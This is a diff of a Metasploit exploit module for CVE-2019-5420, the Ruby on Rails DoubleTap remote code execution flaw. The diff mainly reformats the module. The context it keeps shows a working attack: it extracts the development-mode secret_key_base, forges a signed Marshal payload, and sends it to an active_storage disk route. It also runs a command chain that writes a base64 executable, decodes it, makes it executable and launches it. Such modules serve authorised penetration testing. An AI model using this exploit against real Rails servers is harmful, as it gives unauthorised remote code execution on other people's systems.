@@ -11,54 +11,55 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
   include Msf::Auxiliary::Report
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => 'Ruby On Rails DoubleTap Development Mode secret_key_base Vulnerability',
-      'Description'    => %q{
-        This module exploits a vulnerability in Ruby on Rails. In development mode, a Rails
-        application would use its name as the secret_key_base, and can be easily extracted by
-        visiting an invalid resource for a path. As a result, this allows a remote user to
-        create and deliver a signed serialized payload, load it by the application, and gain
-        remote code execution.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ruby On Rails DoubleTap Development Mode secret_key_base Vulnerability',
+        'Description' => %q{
+          This module exploits a vulnerability in Ruby on Rails. In development mode, a Rails
+          application would use its name as the secret_key_base, and can be easily extracted by
+          visiting an invalid resource for a path. As a result, this allows a remote user to
+          create and deliver a signed serialized payload, load it by the application, and gain
+          remote code execution.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'ooooooo_q', # Reported the vuln on hackerone
           'mpgn',      # Proof-of-Concept
           'sinn3r'     # Metasploit module
         ],
-      'References'     =>
-        [
+        'References' => [
           [ 'CVE', '2019-5420' ],
           [ 'URL', 'https://hackerone.com/reports/473888' ],
           [ 'URL', 'https://github.com/mpgn/Rails-doubletap-RCE' ],
           [ 'URL', 'https://groups.google.com/forum/#!searchin/rubyonrails-security/CVE-2019-5420/rubyonrails-security/IsQKvDqZdKw/UYgRCJz2CgAJ' ],
           [ 'URL', 'https://www.zerodayinitiative.com/blog/2019/6/20/remote-code-execution-via-ruby-on-rails-active-storage-insecure-deserialization' ]
         ],
-      'Platform'       => 'linux',
-      'Targets'        =>
-        [
-          [ 'Ruby on Rails 5.2 and prior', { } ]
+        'Platform' => 'linux',
+        'Targets' => [
+          [ 'Ruby on Rails 5.2 and prior', {} ]
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'RPORT' => 3000
         },
-      'Notes'          =>
-        {
-          'AKA'         => [ 'doubletap' ],
-          'Stability'   => [ CRASH_SAFE  ],
-          'SideEffects' => [ IOC_IN_LOGS ]
+        'Notes' => {
+          'AKA' => [ 'doubletap' ],
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => UNKNOWN_RELIABILITY
         },
-      'Privileged'     => false,
-      'DisclosureDate' => '2019-03-13',
-      'DefaultTarget'  => 0))
+        'Privileged' => false,
+        'DisclosureDate' => '2019-03-13',
+        'DefaultTarget' => 0
+      )
+    )
 
     register_options(
       [
         OptString.new('TARGETURI', [true, 'The route for the Rails application', '/']),
-      ])
+      ]
+    )
   end
 
   NO_RAILS_ROOT_MSG = 'No Rails.root info'
@@ -103,6 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
   class MessageVerifier
     def initialize(secret, options = {})
       raise ArgumentError, 'Secret should not be nil.' unless secret
+
       @secret = secret
       @digest = options[:digest] || 'SHA1'
       @serializer = options[:serializer] || Marshal
@@ -137,6 +139,7 @@ class MetasploitModule < Msf::Exploit::Remote
   rescue Msf::Exploit::Failed => e
     vprint_error(e.message)
     return check_code if e.message.to_s.include? NO_RAILS_ROOT_MSG
+
     CheckCode::Unknown
   end
 
@@ -144,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def get_rails_root_info
     res = send_request_cgi({
       'method' => 'GET',
-      'uri'    => normalize_uri(target_uri.path, 'rails', Rex::Text.rand_text_alphanumeric(32)),
+      'uri' => normalize_uri(target_uri.path, 'rails', Rex::Text.rand_text_alphanumeric(32)),
     })
 
     fail_with(Failure::Unknown, 'No response from the server') unless res
@@ -170,7 +173,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_file_for_cleanup(b64_fname, bin_fname)
     p = Rex::Text.encode_base64(generate_payload_exe)
 
-    c  = "File.open('#{b64_fname}', 'wb') { |f| f.write('#{p}') }; "
+    c = "File.open('#{b64_fname}', 'wb') { |f| f.write('#{p}') }; "
     c << "%x(base64 --decode #{b64_fname} > #{bin_fname}); "
     c << "%x(chmod +x #{bin_fname}); "
     c << "%x(#{bin_fname})"
@@ -195,8 +198,8 @@ class MetasploitModule < Msf::Exploit::Remote
   # If the payload fails, the server should return 404. If successful, then 200.
   def send_serialized_payload(rails_payload)
     res = send_request_cgi({
-      'method'  => 'GET',
-      'uri'     => "/rails/active_storage/disk/#{rails_payload}/test",
+      'method' => 'GET',
+      'uri' => "/rails/active_storage/disk/#{rails_payload}/test",
     })
 
     if res && res.code != 200
